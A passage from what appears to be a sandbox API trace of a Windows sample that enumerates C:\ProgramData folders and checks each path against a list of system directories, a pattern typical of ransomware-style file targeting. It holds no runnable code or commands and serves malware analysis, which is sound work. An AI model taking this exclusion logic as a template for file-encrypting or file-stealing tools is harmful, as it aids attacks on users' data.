psz1="C:\\ProgramData\\", psz2="Comms", cchMax=1054 | out: psz1="C:\\ProgramData\\Comms") returned="C:\\ProgramData\\Comms" [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\system32\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\system\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\appdata\\local\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch=":\\boot\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch=":\\perflogs\\") returned 0x0 [0089.790] StrStrIW (lpFirst="C:\\ProgramData\\Comms", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Comms" [0089.790] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0089.790] StrCmpW (psz1="Desktop", psz2=".") returned 1 [0089.790] StrCmpW (psz1="Desktop", psz2="..") returned 1 [0089.790] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x78624286, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x78624286, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x78624286, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0089.791] StrCmpW (psz1="Documents", psz2=".") returned 1 [0089.791] StrCmpW (psz1="Documents", psz2="..") returned 1 [0089.791] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc93dc4da, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xc93dc4da, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0089.791] StrCmpW (psz1="Microsoft", psz2=".") returned 1 [0089.791] StrCmpW (psz1="Microsoft", psz2="..") returned 1 [0089.791] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3ecd6462, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x3ecd6462, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x3ecd6462, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft OneDrive", cAlternateFileName="MICROS~2")) returned 1 [0089.791] StrCmpW (psz1="Microsoft OneDrive", psz2=".") returned 1 [0089.791] StrCmpW (psz1="Microsoft OneDrive", psz2="..") returned 1 [0089.791] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0089.791] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0089.791] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Microsoft OneDrive", cchMax=1054 | out: psz1="C:\\ProgramData\\Microsoft OneDrive") returned="C:\\ProgramData\\Microsoft OneDrive" [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\system32\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\system\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\appdata\\local\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch=":\\boot\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch=":\\perflogs\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Microsoft OneDrive", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Microsoft OneDrive" [0089.791] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa2d56a03, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa2d56a03, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa2d56a03, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Oracle", cAlternateFileName="")) returned 1 [0089.791] StrCmpW (psz1="Oracle", psz2=".") returned 1 [0089.791] StrCmpW (psz1="Oracle", psz2="..") returned 1 [0089.791] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0089.791] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0089.791] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Oracle", cchMax=1054 | out: psz1="C:\\ProgramData\\Oracle") returned="C:\\ProgramData\\Oracle" [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\system32\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.791] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\system\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\appdata\\local\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch=":\\boot\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch=":\\perflogs\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Oracle", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Oracle" [0089.792] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcf03b3d5, ftCreationTime.dwHighDateTime=0x1d327b7, ftLastAccessTime.dwLowDateTime=0xdefc9a0c, ftLastAccessTime.dwHighDateTime=0x1d327b7, ftLastWriteTime.dwLowDateTime=0xdefc9a0c, ftLastWriteTime.dwHighDateTime=0x1d327b7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Package Cache", cAlternateFileName="PACKAG~1")) returned 1 [0089.792] StrCmpW (psz1="Package Cache", psz2=".") returned 1 [0089.792] StrCmpW (psz1="Package Cache", psz2="..") returned 1 [0089.792] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0089.792] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0089.792] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="Package Cache", cchMax=1054 | out: psz1="C:\\ProgramData\\Package Cache") returned="C:\\ProgramData\\Package Cache" [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\system32\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\system\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\appdata\\local\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch=":\\boot\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch=":\\perflogs\\") returned 0x0 [0089.792] StrStrIW (lpFirst="C:\\ProgramData\\Package Cache", lpSrch=":\\programdata\\") returned=":\\ProgramData\\Package Cache" [0089.792] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x30, ftCreationTime.dwLowDateTime=0x17d079d0, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc3122174, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x53fba98c, ftLastWriteTime.dwHighDateTime=0x1d327e9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="regid.1991-06.com.microsoft", cAlternateFileName="REGID1~1.MIC")) returned 1 [0089.792] StrCmpW (psz1="regid.1991-06.com.microsoft", psz2=".") returned 1 [0089.792] StrCmpW (psz1="regid.1991-06.com.microsoft", psz2="..") returned 1 [0089.792] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0089.792] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0089.792] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="regid.1991-06.com.microsoft", cchMax=1054 | out: psz1="C:\\ProgramData\\regid.1991-06.com.microsoft") returned="C:\\ProgramData\\regid.1991-06.com.microsoft" [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\system32\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\system\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\appdata\\local\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch=":\\boot\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch=":\\perflogs\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\regid.1991-06.com.microsoft", lpSrch=":\\programdata\\") returned=":\\ProgramData\\regid.1991-06.com.microsoft" [0089.793] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xc31230fe, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17d2dc32, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SoftwareDistribution", cAlternateFileName="SOFTWA~1")) returned 1 [0089.793] StrCmpW (psz1="SoftwareDistribution", psz2=".") returned 1 [0089.793] StrCmpW (psz1="SoftwareDistribution", psz2="..") returned 1 [0089.793] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0089.793] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0089.793] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="SoftwareDistribution", cchMax=1054 | out: psz1="C:\\ProgramData\\SoftwareDistribution") returned="C:\\ProgramData\\SoftwareDistribution" [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\system32\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\system\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\appdata\\local\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch=":\\boot\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch=":\\perflogs\\") returned 0x0 [0089.793] StrStrIW (lpFirst="C:\\ProgramData\\SoftwareDistribution", lpSrch=":\\programdata\\") returned=":\\ProgramData\\SoftwareDistribution" [0089.793] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x7877b7ce, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x7877b7ce, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7877b7ce, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0089.793] StrCmpW (psz1="Start Menu", psz2=".") returned 1 [0089.793] StrCmpW (psz1="Start Menu", psz2="..") returned 1 [0089.794] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x7877b7ce, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x7877b7ce, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x7877b7ce, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0089.794] StrCmpW (psz1="Templates", psz2=".") returned 1 [0089.794] StrCmpW (psz1="Templates", psz2="..") returned 1 [0089.794] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17d2dc32, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0x1931975, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x1931975, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOPrivate", cAlternateFileName="USOPRI~1")) returned 1 [0089.794] StrCmpW (psz1="USOPrivate", psz2=".") returned 1 [0089.794] StrCmpW (psz1="USOPrivate", psz2="..") returned 1 [0089.794] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0089.794] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0089.794] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="USOPrivate", cchMax=1054 | out: psz1="C:\\ProgramData\\USOPrivate") returned="C:\\ProgramData\\USOPrivate" [0089.794] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\system32\\") returned 0x0 [0089.794] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.794] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\system\\") returned 0x0 [0089.794] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.794] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.794] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\appdata\\local\\") returned 0x0 [0089.794] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.794] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.794] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.794] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch=":\\boot\\") returned 0x0 [0089.794] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch=":\\perflogs\\") returned 0x0 [0089.794] StrStrIW (lpFirst="C:\\ProgramData\\USOPrivate", lpSrch=":\\programdata\\") returned=":\\ProgramData\\USOPrivate" [0089.794] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa4ade3, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0xa4ade3, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xa4ade3, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="USOShared", cAlternateFileName="USOSHA~1")) returned 1 [0089.794] StrCmpW (psz1="USOShared", psz2=".") returned 1 [0089.794] StrCmpW (psz1="USOShared", psz2="..") returned 1 [0089.794] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0089.794] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0089.795] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="USOShared", cchMax=1054 | out: psz1="C:\\ProgramData\\USOShared") returned="C:\\ProgramData\\USOShared" [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\system32\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\system\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\appdata\\local\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch=":\\boot\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch=":\\perflogs\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\USOShared", lpSrch=":\\programdata\\") returned=":\\ProgramData\\USOShared" [0089.795] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xc32c07ca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsHolographicDevices", cAlternateFileName="WINDOW~1")) returned 1 [0089.795] StrCmpW (psz1="WindowsHolographicDevices", psz2=".") returned 1 [0089.795] StrCmpW (psz1="WindowsHolographicDevices", psz2="..") returned 1 [0089.795] StrCpyNW (in: psz1=0xeda7a8, psz2="C:\\ProgramData", cchMax=1054 | out: psz1="C:\\ProgramData") returned="C:\\ProgramData" [0089.795] StrNCatW (in: psz1="C:\\ProgramData", psz2="\\", cchMax=1054 | out: psz1="C:\\ProgramData\\") returned="C:\\ProgramData\\" [0089.795] StrNCatW (in: psz1="C:\\ProgramData\\", psz2="WindowsHolographicDevices", cchMax=1054 | out: psz1="C:\\ProgramData\\WindowsHolographicDevices") returned="C:\\ProgramData\\WindowsHolographicDevices" [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\system32\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\syswow64\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\system\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\windows\\winsxs\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\appdata\\roaming\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\appdata\\local\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\appdata\\locallow\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\all users\\microsoft\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch="\\inetpub\\logs\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch=":\\boot\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch=":\\perflogs\\") returned 0x0 [0089.795] StrStrIW (lpFirst="C:\\ProgramData\\WindowsHolographicDevices", lpSrch=":\\programdata\\") returned=":\\ProgramData\\WindowsHolographicDevices" [0089.795] FindNextFileW (in: hFindFile=0xec2770, lpFindFileData=0x561f770 | out: lpFindFileData=0x561f770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xe6d9d2c8, ftCreationTime.dwHighDateTime=0x1d2a058, ftLastAccessTime.dwLowDateTime=0xc32c07ca, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xe6dc3522, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WindowsHolographicDevices", cAlternateFileName="WINDOW~1")) returned 0 [0089.796] FindClose (in: hFindFile=0xec2770 | out: hFindFile=0xec2770) returned 1 [0089.796] GetProcessHeap () returned 0xe30000 [0089.796] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xeda7a8 | out: hHeap=0xe30000) returned 1 [0089.796] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | out: lpFindFileData=0x561fa20*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28e9c3a2, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x1044dfc5, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x1044dfc5, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0089.796] StrCmpW (psz1="Recovery", psz2=".") returned 1 [0089.796] StrCmpW (psz1="Recovery", psz2="..") returned 1 [0089.796] FindNextFileW (in: hFindFile=0xec21b0, lpFindFileData=0x561fa20 | 